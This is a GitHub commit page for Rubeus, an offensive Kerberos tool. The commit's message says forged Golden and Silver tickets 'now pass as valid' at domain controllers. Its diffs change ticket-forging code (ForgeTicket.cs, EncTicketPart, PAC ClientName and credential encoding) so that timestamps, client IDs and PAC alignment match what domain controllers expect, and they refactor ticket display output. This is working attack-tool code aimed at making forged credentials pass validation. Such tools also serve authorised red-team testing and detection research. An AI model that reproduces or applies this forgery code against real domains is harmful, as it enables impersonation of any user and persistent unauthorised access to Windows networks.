Skip to content

Commit

Permalink
Golden/Silver tickets now pass as valid by DC's :)
Browse files Browse the repository at this point in the history
  • Loading branch information
@CCob
CCob committed May 28, 2021
1 parent 5824610 commit 20cd8f1
Show file tree
Hide file tree
Showing 6 changed files with 36 additions and 35 deletions.
8 changes: 4 additions & 4 deletions Rubeus/lib/ForgeTicket.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -129,15 +129,15 @@ public static void ForgeTicket(string user, string sname, string keyString, Inte
kvi.BadPasswordCount = short.Parse(u.Properties["badpwdcount"][0].ToString());
if (Int64.Parse(u.Properties["lastlogon"][0].ToString()) != 0)
{
kvi.LogonTime = new Ndr._FILETIME(DateTime.FromFileTime((long)u.Properties["lastlogon"][0]));
kvi.LogonTime = new Ndr._FILETIME(DateTime.FromFileTimeUtc((long)u.Properties["lastlogon"][0]));
}
if (Int64.Parse(u.Properties["lastlogoff"][0].ToString()) != 0)
{
kvi.LogoffTime = new Ndr._FILETIME(DateTime.FromFileTime((long)u.Properties["lastlogoff"][0]));
kvi.LogoffTime = new Ndr._FILETIME(DateTime.FromFileTimeUtc((long)u.Properties["lastlogoff"][0]));
}
if (Int64.Parse(u.Properties["pwdlastset"][0].ToString()) != 0)
{
kvi.PasswordLastSet = new Ndr._FILETIME(DateTime.FromFileTime((long)u.Properties["pwdlastset"][0]));
kvi.PasswordLastSet = new Ndr._FILETIME(DateTime.FromFileTimeUtc((long)u.Properties["pwdlastset"][0]));
}
kvi.PrimaryGroupId = (int)u.Properties["primarygroupid"][0];
kvi.UserId = Int32.Parse(objectSid.Substring(objectSid.LastIndexOf('-')+1));
Expand Down Expand Up @@ -292,7 +292,7 @@ public static void ForgeTicket(string user, string sname, string keyString, Inte
return;
}

EncTicketPart decTicketPart = new EncTicketPart(randKeyBytes, etype, domain.ToUpper(), user, flags);
EncTicketPart decTicketPart = new EncTicketPart(randKeyBytes, etype, domain.ToUpper(), user, flags, cn.ClientId);

// generate clear signatures
svrSigData.Signature = new byte[sigLength];
Expand Down
39 changes: 17 additions & 22 deletions Rubeus/lib/LSA.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -529,16 +529,11 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
// extractKerberoastHash - extract out the rc4_hmac "kerberoastable" hash, if possible
// nowrap - don't wrap base64 ticket output

var dateFormat = "dd/MM/yyyy HH:mm:ss";
var userName = string.Join("@", cred.enc_part.ticket_info[0].pname.name_string.ToArray());
var domainName = cred.enc_part.ticket_info[0].prealm;
var sname = string.Join("/", cred.enc_part.ticket_info[0].sname.name_string.ToArray());
var srealm = cred.enc_part.ticket_info[0].srealm;
var keyType = String.Format("{0}", (Interop.KERB_ETYPE)cred.enc_part.ticket_info[0].key.keytype);
var b64Key = Convert.ToBase64String(cred.enc_part.ticket_info[0].key.keyvalue);
var startTime = TimeZone.CurrentTimeZone.ToLocalTime(cred.enc_part.ticket_info[0].starttime);
var endTime = TimeZone.CurrentTimeZone.ToLocalTime(cred.enc_part.ticket_info[0].endtime);
var renewTill = TimeZone.CurrentTimeZone.ToLocalTime(cred.enc_part.ticket_info[0].renew_till);
var flags = cred.enc_part.ticket_info[0].flags;
var b64Key = Convert.ToBase64String(cred.enc_part.ticket_info[0].key.keyvalue);
var base64ticket = Convert.ToBase64String(cred.Encode().Encode());
string indent = new string(' ', indentLevel);
string serviceName = sname.Split('/')[0];
Expand All @@ -547,11 +542,11 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
if (displayTGT)
{
// abbreviated display used for monitor/etc.
Console.WriteLine("{0}User : {1}@{2}", indent, userName, domainName);
Console.WriteLine("{0}StartTime : {1}", indent, startTime);
Console.WriteLine("{0}EndTime : {1}", indent, endTime);
Console.WriteLine("{0}RenewTill : {1}", indent, renewTill);
Console.WriteLine("{0}Flags : {1}", indent, flags);
Console.WriteLine("{0}User : {1}@{2}", indent, userName, cred.enc_part.ticket_info[0].prealm);
Console.WriteLine("{0}StartTime : {1}", indent, cred.enc_part.ticket_info[0].starttime.ToLocalTime().ToString(dateFormat));
Console.WriteLine("{0}EndTime : {1}", indent, cred.enc_part.ticket_info[0].endtime.ToLocalTime().ToString(dateFormat));
Console.WriteLine("{0}RenewTill : {1}", indent, cred.enc_part.ticket_info[0].renew_till.ToLocalTime().ToString(dateFormat));
Console.WriteLine("{0}Flags : {1}", indent, cred.enc_part.ticket_info[0].flags);
Console.WriteLine("{0}Base64EncodedTicket :\r\n", indent);

if (Rubeus.Program.wrapTickets)
Expand All @@ -570,13 +565,13 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
{
// full display with session key
Console.WriteLine("\r\n{0}ServiceName : {1}", indent, sname);
Console.WriteLine("{0}ServiceRealm : {1}", indent, srealm);
Console.WriteLine("{0}ServiceRealm : {1}", indent, cred.enc_part.ticket_info[0].srealm);
Console.WriteLine("{0}UserName : {1}", indent, userName);
Console.WriteLine("{0}UserRealm : {1}", indent, domainName);
Console.WriteLine("{0}StartTime : {1}", indent, startTime);
Console.WriteLine("{0}EndTime : {1}", indent, endTime);
Console.WriteLine("{0}RenewTill : {1}", indent, renewTill);
Console.WriteLine("{0}Flags : {1}", indent, flags);
Console.WriteLine("{0}UserRealm : {1}", indent, cred.enc_part.ticket_info[0].prealm);
Console.WriteLine("{0}StartTime : {1}", indent, cred.enc_part.ticket_info[0].starttime.ToLocalTime());
Console.WriteLine("{0}EndTime : {1}", indent, cred.enc_part.ticket_info[0].endtime.ToLocalTime());
Console.WriteLine("{0}RenewTill : {1}", indent, cred.enc_part.ticket_info[0].renew_till.ToLocalTime());
Console.WriteLine("{0}Flags : {1}", indent, cred.enc_part.ticket_info[0].flags);
Console.WriteLine("{0}KeyType : {1}", indent, keyType);
Console.WriteLine("{0}Base64(key) : {1}", indent, b64Key);

Expand Down Expand Up @@ -620,7 +615,7 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
{
if (String.IsNullOrEmpty(serviceDomain))
{
serviceDomain = domainName;
serviceDomain = cred.enc_part.ticket_info[0].prealm;
}
if (serviceUser.EndsWith("$"))
{
Expand Down Expand Up @@ -655,7 +650,7 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
if (pacInfoBuffer is ClientName cn)
{
Console.WriteLine("{0} ClientName :", indent);
Console.WriteLine("{0} Client Id : {1}", indent, cn.ClientId);
Console.WriteLine("{0} Client Id : {1}", indent, cn.ClientId.ToLocalTime().ToString(dateFormat));
Console.WriteLine("{0} Client Name : {1}", indent, cn.Name);
}
else if (pacInfoBuffer is UpnDns upnDns)
Expand Down Expand Up @@ -704,12 +699,12 @@ public static void DisplayTicket(KRB_CRED cred, int indentLevel = 2, bool displa
Console.WriteLine("{0} UserId : {1}", indent, li.KerbValidationInfo.UserId);
Console.WriteLine("{0} PrimaryGroupId : {1}", indent, li.KerbValidationInfo.PrimaryGroupId);
Console.WriteLine("{0} GroupCount : {1}", indent, li.KerbValidationInfo.GroupCount);
Console.WriteLine("{0} Groups : {1}", indent, li.KerbValidationInfo.GroupIds.GetValue().Select(g => g.RelativeId.ToString()).Aggregate((cur, next) => cur + "," + next));
Console.WriteLine("{0} Groups : {1}", indent, li.KerbValidationInfo.GroupIds?.GetValue().Select(g => g.RelativeId.ToString()).Aggregate((cur, next) => cur + "," + next));
Console.WriteLine("{0} UserFlags : ({1}) {2}", indent, li.KerbValidationInfo.UserFlags, (Interop.PacUserFlags)li.KerbValidationInfo.UserFlags);
Console.WriteLine("{0} UserSessionKey : {1}", indent, Helpers.ByteArrayToString((byte[])(Array)li.KerbValidationInfo.UserSessionKey.data[0].data));
Console.WriteLine("{0} LogonServer : {1}", indent, li.KerbValidationInfo.LogonServer);
Console.WriteLine("{0} LogonDomainName : {1}", indent, li.KerbValidationInfo.LogonDomainName);
Console.WriteLine("{0} LogonDomainId : {1}", indent, li.KerbValidationInfo.LogonDomainId.GetValue());
Console.WriteLine("{0} LogonDomainId : {1}", indent, li.KerbValidationInfo.LogonDomainId?.GetValue());
Console.WriteLine("{0} UserAccountControl : ({1}) {2}", indent, li.KerbValidationInfo.UserAccountControl, (Interop.PacUserAccountControl)li.KerbValidationInfo.UserAccountControl);
Console.WriteLine("{0} ExtraSIDCount : {1}", indent, li.KerbValidationInfo.SidCount);
if (li.KerbValidationInfo.SidCount > 0)
Expand Down
6 changes: 3 additions & 3 deletions Rubeus/lib/krb_structures/EncTicketPart.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -24,14 +24,14 @@ public class EncTicketPart
// authorization-data[10] AuthorizationData OPTIONAL
//}

public EncTicketPart(byte[] sessionKey, Interop.KERB_ETYPE etype, string domain, string user, Interop.TicketFlags ticketFlags)
public EncTicketPart(byte[] sessionKey, Interop.KERB_ETYPE etype, string domain, string user, Interop.TicketFlags ticketFlags, DateTime startTime)
{
// flags
flags = ticketFlags;

// default times
authtime = DateTime.UtcNow;
starttime = DateTime.UtcNow;
authtime = startTime;
starttime = startTime;
endtime = starttime.AddHours(10);
renew_till = starttime.AddDays(7);

Expand Down
11 changes: 7 additions & 4 deletions Rubeus/lib/krb_structures/pac/ClientName.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,8 +6,11 @@

namespace Rubeus.Kerberos.PAC {
public class ClientName : PacInfoBuffer {
public ClientName(DateTime clientId, string name) {
ClientId = clientId;
public ClientName(DateTime clientId, string name) {
ClientId = new DateTime(
clientId.Ticks - (clientId.Ticks % TimeSpan.TicksPerSecond),
clientId.Kind
);
NameLength = (short)(name.Length * 2);
Name = name;
Type = PacInfoBufferType.ClientName;
Expand All @@ -22,14 +25,14 @@ public ClientName(byte[] data) : base(data, PacInfoBufferType.ClientName) {
public string Name { get; set; }

protected override void Decode(byte[] data) {
ClientId = DateTime.FromFileTime(br.ReadInt64());
ClientId = DateTime.FromFileTimeUtc(br.ReadInt64());
NameLength = br.ReadInt16();
Name = Encoding.Unicode.GetString(br.ReadBytes(NameLength));
}

public override byte[] Encode() {
BinaryWriter bw = new BinaryWriter(new MemoryStream());
bw.Write(ClientId.ToFileTime());
bw.Write(ClientId.ToFileTimeUtc());
bw.Write(NameLength);
bw.Write(Encoding.Unicode.GetBytes(Name));
return ((MemoryStream)bw.BaseStream).ToArray();
Expand Down
4 changes: 2 additions & 2 deletions Rubeus/lib/krb_structures/pac/Ndr/Kerberos_PAC.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -464,14 +464,14 @@ public _FILETIME(uint LowDateTime, uint HighDateTime) {
this.HighDateTime = HighDateTime;
}
public _FILETIME(DateTime dateTime) {
var fileTime = dateTime.ToFileTime();
var fileTime = dateTime.ToFileTimeUtc();
LowDateTime = (uint)(fileTime & 0xffffffff);
HighDateTime = (uint)( (fileTime >> 32) & 0xffffffff);
}

public override string ToString() {
if (LowDateTime != 0xffffffff && HighDateTime != 0x7fffffff) {
return DateTime.FromFileTime((long)LowDateTime | ((long)HighDateTime << 32)).ToString();
return DateTime.FromFileTimeUtc((long)LowDateTime | ((long)HighDateTime << 32)).ToString("dd/MM/yyyy HH:mm:ss.fff");
} else {
return "";
}
Expand Down
3 changes: 3 additions & 0 deletions Rubeus/lib/krb_structures/pac/PacCredentialInfo.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -35,6 +35,9 @@ public override byte[] Encode() {
var encData = Crypto.KerberosEncrypt(EncryptionType, Interop.KRB_KEY_USAGE_KRB_NON_KERB_SALT, key, plainText);
bw.Write(encData);

long alignment = ((bw.BaseStream.Position + 7) / 8) * 8;
bw.BaseStream.SetLength(alignment);

return ((MemoryStream)bw.BaseStream).ToArray();
}

Expand Down

0 comments on commit 20cd8f1

Please sign in to comment.